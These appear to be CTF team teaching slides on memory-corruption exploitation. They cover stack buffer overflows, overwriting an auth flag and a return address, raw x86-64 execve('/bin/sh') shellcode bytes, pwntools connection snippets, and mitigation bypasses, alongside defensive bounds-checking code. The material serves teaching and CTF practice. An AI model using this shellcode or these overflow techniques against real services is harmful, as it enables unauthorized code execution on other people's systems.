PWNING 101 - p.1
spritzers - CTF team
spritz.math.unipd.it/spritzers.html
Disclaimer
All information presented here has the only purpose to teach how vulnerabilities work.
Use them to win CTFs and to build secure systems.
Do not hack your neighbor’s fancy IoT fridge.
Pwning in CTFs
In pwn challenges you have to exploit a remote service.
You typically want to get a shell and cat flag.
Most of the time, it’s a memory corruption vulnerability.
What’s memory corruption?
Modifying a process’ memory in a way the programmer (or compiler) didn’t intend.
If we control the memory, we control the process.
Memory corruption in the wild
● Malware
  ○ Morris (1988!), CodeRed, Blaster, Sasser, Conficker, ...
  ○ More recently, StuxNet and WannaCry
● Remote services and user applications
  ○ Exposed to untrusted data
● Unlocking devices
  ○ Android roots, iOS jailbreaks, gaming consoles (I started here!)
Memory corruption vulnerabilities
● Buffer overflows
● Format strings
● Use of uninitialized memory
● Dangling pointers (e.g., use-after-free)
● Type confusion
● Heap metadata corruption
… and many more
Memory corruption attacks
Two main subclasses:
● Non-Control-Data Attacks manipulate the application’s state and data
● Control-Flow Attacks manipulate the execution flow
Exploitation
Finding a vulnerability is just the first step.
Uncontrolled memory corruption typically results in a crash (e.g., SIGSEGV).
We need to channel the vulnerability into whatever we want to do.
Exploitation
First, we set things up for the upcoming corruption.
Then, we trigger it and watch the dominoes fall down.
The tool that performs this is an exploit.
What’s memory?
Memory is a flat sequence of bytes. That’s it.
Each byte is identified by an address.
Via memory protection, areas of memory can be marked as readable, writable, executable.

        +0 +1 +2 +3
   +0   01 cd 4b 3f
   +4   96 a1 39 bb
   +8   22 33 cd e0
Interpretations of memory
Types do not exist in memory. They are just abstractions that define how a certain range of bytes is interpreted.
Example: integers (and pointers) are little-endian on x86.
    78 56 34 12 <-> 0x12345678
Example: C arrays are a contiguous sequence of elements.
A process’ memory
Regions: Stack, Heap, Main executable, Libraries (addresses start at 0x0000...)
Sections of the main executable:
  .text    Code
  .rodata  Read-only data
  .got     Imports stuff
  .data    Read/write data
  .bss     Zero-init’ed data
  .plt     Imports stuff
Buffer overflows
Some languages (such as C/C++) do not check array bounds.
If the programmer doesn’t perform those checks, he might write data beyond the buffer’s boundaries.
This is bad. Like, really bad, man.
Buffer overflows
This program copies the user’s input to a fixed size 32-byte buffer.

Memory before any input (the 32-byte buffer, then the bytes that follow it):
  Buffer:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
           00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  After:   79 6f 75 74 75 2e 62 65 2f 67 36 74 75 65 70 6d 55 6d 4a 67 00 00 00 00
           ...
           00 00 00 00 63 00 00 00 ca fe ba be 00 13 37 00 00 00 00 aa 00 bb 42 42

Input: 20 ‘A’
  Buffer:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
           41 41 41 41 00 00 00 00 00 00 00 00 00 00 00 00
  After:   79 6f 75 74 75 2e 62 65 2f 67 36 74 75 65 70 6d 55 6d 4a 67 00 00 00 00
           ...
           00 00 00 00 63 00 00 00 ca fe ba be 00 13 37 00 00 00 00 aa 00 bb 42 42

Input: 40 ‘A’
  Buffer:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
           41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
  After:   41 41 41 41 41 41 41 41 2f 67 36 74 75 65 70 6d 55 6d 4a 67 00 00 00 00
           ...
           00 00 00 00 63 00 00 00 ca fe ba be 00 13 37 00 00 00 00 aa 00 bb 42 42
Overflow: the 8 bytes that did not fit were written past the end of the buffer.
Exercise platform
http://spritzctf.pythonanywhere.com/
Exercise 1 - Auth Overflow
Inspired from Jon Erickson’s “Hacking: The Art of Exploitation”

    #include <stdio.h>

    int check_authentication() {
        int auth_flag = 0;
        char password_buffer[16];

        printf("Enter password: ");
        scanf("%s", password_buffer);   /* no width: anything longer than 15 chars spills past the buffer */
        /* password_buffer ok? => auth_flag = 1 */
        return auth_flag;
    }
Exercise 1 - The overflow
Stack frame, offsets from the start of password_buffer:
  +0x00  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??   Buffer (16 bytes)
  +0x10  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??               (12 bytes in between)
  +0x1c  00 00 00 00                                       Flag = 0

Input: 29 ‘A’
  +0x00  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   Buffer
  +0x10  41 41 41 41 41 41 41 41 41 41 41 41
  +0x1c  41 00 00 00                                       Flag = 65
check_authentication will now return 65.
Exercise 1 - The check

    if (check_authentication())     /* returns 65 */
        /* access granted */

In C, anything != 0 is true.
The check will pass and grant us access. Profit!
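A bounded version of check_authentication, as an added example rather than the exercise’s own code: the input length is checked against the buffer before anything is copied, and the stdin variant gives %s a width. The expected password "hunter2" is a constructed placeholder, since the real check is not on the slides.

```c
#include <stdio.h>
#include <string.h>

#define PASSWORD_MAX 16                     /* same 16-byte buffer as the slide */
static const char *EXPECTED = "hunter2";    /* constructed example secret, not the exercise's */

/* Bounded rewrite of check_authentication. It takes the candidate password as
 * a string so it can be exercised without stdin, and refuses anything that
 * would not fit in password_buffer (terminator included) instead of letting
 * the copy run on into auth_flag and the rest of the stack frame. */
int check_authentication_fixed(const char *input) {
    int auth_flag = 0;
    char password_buffer[PASSWORD_MAX];
    size_t len = strlen(input);

    if (len >= sizeof password_buffer)      /* 29 'A' is rejected here; the flag stays 0 */
        return 0;
    memcpy(password_buffer, input, len + 1);

    if (strcmp(password_buffer, EXPECTED) == 0)
        auth_flag = 1;
    return auth_flag;
}

/* The same read done on stdin the way the slide does it, but with a width on
 * %s: scanf then stores at most PASSWORD_MAX - 1 characters plus the
 * terminator, so an over-long password is truncated and fails the comparison
 * rather than overwriting auth_flag. */
int check_authentication_stdin(void) {
    char password_buffer[PASSWORD_MAX];
    printf("Enter password: ");
    if (scanf("%15s", password_buffer) != 1)   /* 15 == PASSWORD_MAX - 1 */
        return 0;
    return check_authentication_fixed(password_buffer);
}

int main(void) {
    return check_authentication_stdin() ? 0 : 1;
}
```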
Pwntools installation
Install python and pip:
● [sudo] apt install python-pip
● [sudo] dnf install python-pip
● [sudo] pacman -S python2-pip
Install pwntools:
    pip2 install --user pwntools
Stack overflows
The stack contains information that keeps track of the program’s control flow.
Overflowing a buffer located on the stack could allow us to hijack the flow to wherever we want.
Must read: Aleph One, Smashing the stack for fun and profit, Phrack (1996)
The x86 stack

    void bar() {
        char baz[32];
        /* … */
    }

    void foo() {
        int abc, def;
        bar();
    }

    int main() {
        foo();
    }

Each call pushes a frame, and the stack grows from higher towards lower addresses. The slides step through main -> foo -> bar and back:
1. Inside foo: the frame for foo is [Return address | Saved BP | Locals], from higher to lower addresses. BP points at the saved BP, SP at the end of the locals.
2. foo calls bar: the return address is pushed, SP moves down one slot.
3. bar’s prologue pushes foo’s BP (the saved BP) and sets BP = SP.
4. bar’s prologue reserves room for its locals (baz): the frame for bar is now [Return address | Saved BP | Locals], and SP points below baz.
5. bar’s epilogue releases the locals (SP = BP), pops the saved BP back into BP, and ret pops the return address into IP: we are back in foo’s frame, with SP and BP where they were in step 1.
Stack overflows
This program copies the user’s input to a fixed size 32-byte buffer.
Frame layout: the 32-byte buffer, then the saved BP, then the return address (little-endian).
  Buffer:   ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
  Sv. BP:   c3 90 8b 00 ff 7f 00 00
  Retaddr:  d5 e0 7b 30 b2 55 00 00   Returns to 0x55b2307be0d5

Input: 32 ‘A’
  Buffer:   41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
            41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
  Sv. BP:   c3 90 8b 00 ff 7f 00 00
  Retaddr:  d5 e0 7b 30 b2 55 00 00   Returns to 0x55b2307be0d5

Input: 40 ‘A’
  Buffer:   41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
            41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
  Sv. BP:   41 41 41 41 41 41 41 41
  Retaddr:  d5 e0 7b 30 b2 55 00 00   Returns to 0x55b2307be0d5

Input: 46 ‘A’
  Buffer:   41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
            41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
  Sv. BP:   41 41 41 41 41 41 41 41
  Retaddr:  41 41 41 41 41 41 00 00   Returns to 0x414141414141
IP control achieved!
Exercise 2 - Remote Shell
Exploit plan:
1. Find the offset between buffer and retaddr
2. Overwrite retaddr with spawn_shell
3. Make main return
4. ???
5. Profit!
Shellcode
Sometimes there’s no “magic” function we can return to.
So let’s inject our own code into the process.
This code is called shellcode because it usually opens a shell.
Shellcode
The program copies the user’s input to a fixed size 32-byte stack buffer, located at 0x7fff008b9070.
  Buffer:   ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??   (@ 0x7fff008b9070)
            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
  Sv. BP:   c0 90 8b 00 ff 7f 00 00
  Retaddr:  d5 e0 7b 30 b2 55 00 00   Returns to 0x55b2307be0d5

After the input (shellcode, padding, then the shellcode address):
  Buffer:   31 f6 48 bb 2f 62 69 6e 2f 2f 73 68 56 53 54 5f   Shellcode
            6a 3b 58 31 d2 0f 05 41 41 41 41 41 41 41 41 41   Shellcode (cont.) + Padding
  Sv. BP:   41 41 41 41 41 41 41 41                           Padding
  Retaddr:  70 90 8b 00 ff 7f 00 00   Returns to 0x7fff008b9070 (Shellcode address = the buffer)
Exercise 3 - Useless
buffer @ bp-0x70
String operations: 'A'*6 + 'BC' == 'AAAAAABC'
String length: len('This is a string')
Numeric string to integer: int('12345')
Import pwntools: from pwn import *
Configure pwntools: context(os='linux', arch='x86_64')
Process: p = process('./useless')
Remote connection: p = remote('207.154.238.179', 8193)
Line I/O: p.recvline() / p.sendline('Hello!')
Interactive mode: p.interactive()
Assemble shellcode: asm(shellcraft.sh())
Mitigations
● Stack Canaries
  ○ Secret value overwritten by overflow
  ○ Bypass: infoleak, O(N) bruteforce (forkserver)
● Address Space Layout Randomization (ASLR)
  ○ Can’t jump if I don’t know where the code is
  ○ Bypass: infoleak, O(N) bruteforce (forkserver)
● Write XOR Execute (W⊕X, NX, DEP)
  ○ Prevent code injection
  ○ Bypass: code reuse (e.g., ROP)
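The overflows drawn in Exercise 1 and in the stack overflow slides, plus the stack canary listed above, replayed on a flat byte array as an added example (a constructed model, not the exercise binaries). The field offsets, the saved BP and the return address are the values from the slides; the canary value is made up.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define FRAME_SIZE 48   /* 32-byte buffer + 8-byte saved BP + 8-byte return address */

/* Little-endian interpretation of `width` bytes at `off`, as x86 does it. */
uint64_t read_le(const uint8_t *mem, size_t off, size_t width) {
    uint64_t v = 0;
    for (size_t i = 0; i < width; i++)
        v |= (uint64_t)mem[off + i] << (8 * i);
    return v;
}

/* The slide's own example: 78 56 34 12 <-> 0x12345678 */
uint32_t le_example(void) {
    const uint8_t bytes[4] = {0x78, 0x56, 0x34, 0x12};
    return (uint32_t)read_le(bytes, 0, 4);
}

/* Unchecked copy at offset 0: nothing compares `len` with the field being
 * written, which is the bug on the slides. It is clamped to the frame only so
 * that the model itself stays inside real memory. */
static void unchecked_copy(uint8_t *frame, const uint8_t *in, size_t len) {
    if (len > FRAME_SIZE) len = FRAME_SIZE;
    memcpy(frame, in, len);
}

/* Exercise 1: password_buffer at +0x00 (16 bytes), 12 more bytes at +0x10,
 * auth_flag at +0x1c. scanf("%s") stores the characters plus a NUL.
 * Returns the value of auth_flag after n_chars 'A' were entered. */
uint32_t auth_flag_after_input(size_t n_chars) {
    uint8_t frame[FRAME_SIZE] = {0};        /* auth_flag = 0 */
    uint8_t in[FRAME_SIZE];
    if (n_chars > FRAME_SIZE - 1) n_chars = FRAME_SIZE - 1;
    memset(in, 'A', n_chars);
    in[n_chars] = '\0';
    unchecked_copy(frame, in, n_chars + 1);
    return (uint32_t)read_le(frame, 0x1c, 4);
}

/* Stack overflow slides: 32-byte buffer at +0, saved BP at +32, return
 * address at +40. That program copies exactly the bytes it received (no
 * terminator). Returns the address `ret` would jump to afterwards. */
uint64_t retaddr_after_input(size_t n_chars) {
    uint8_t frame[FRAME_SIZE] = {0};
    const uint8_t saved_bp[8] = {0xc3, 0x90, 0x8b, 0x00, 0xff, 0x7f, 0x00, 0x00};
    const uint8_t retaddr[8]  = {0xd5, 0xe0, 0x7b, 0x30, 0xb2, 0x55, 0x00, 0x00};
    uint8_t in[FRAME_SIZE];
    memcpy(frame + 32, saved_bp, 8);
    memcpy(frame + 40, retaddr, 8);
    memset(in, 'A', sizeof in);
    unchecked_copy(frame, in, n_chars);
    return read_le(frame, 40, 8);
}

/* Stack canary: a secret word sits between the buffer and the control data
 * (in this model it takes the saved-BP slot at +32). The epilogue compares it
 * with the copy kept outside the frame before `ret`, and any overflow long
 * enough to reach the return address has already gone through it.
 * Returns 1 if the check passes, 0 if the process would abort instead. */
int canary_check_passes(size_t n_chars) {
    const uint64_t canary = 0x5a3c00f1e2d4b607ULL;  /* constructed; real ones are random per process */
    uint8_t frame[FRAME_SIZE] = {0};
    uint8_t in[FRAME_SIZE];
    for (size_t i = 0; i < 8; i++)
        frame[32 + i] = (uint8_t)(canary >> (8 * i));
    memset(in, 'A', sizeof in);
    unchecked_copy(frame, in, n_chars);
    return read_le(frame, 32, 8) == canary;
}
```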
What did we learn?
Always check your bounds!
As a general principle, if your application has a memory corruption vulnerability, most of the time a skilled and determined attacker will be able to exploit it.
Stuff to check out
● OverTheWire Vortex (http://overthewire.org/wargames/vortex/)
● sploitF-U-N (https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/)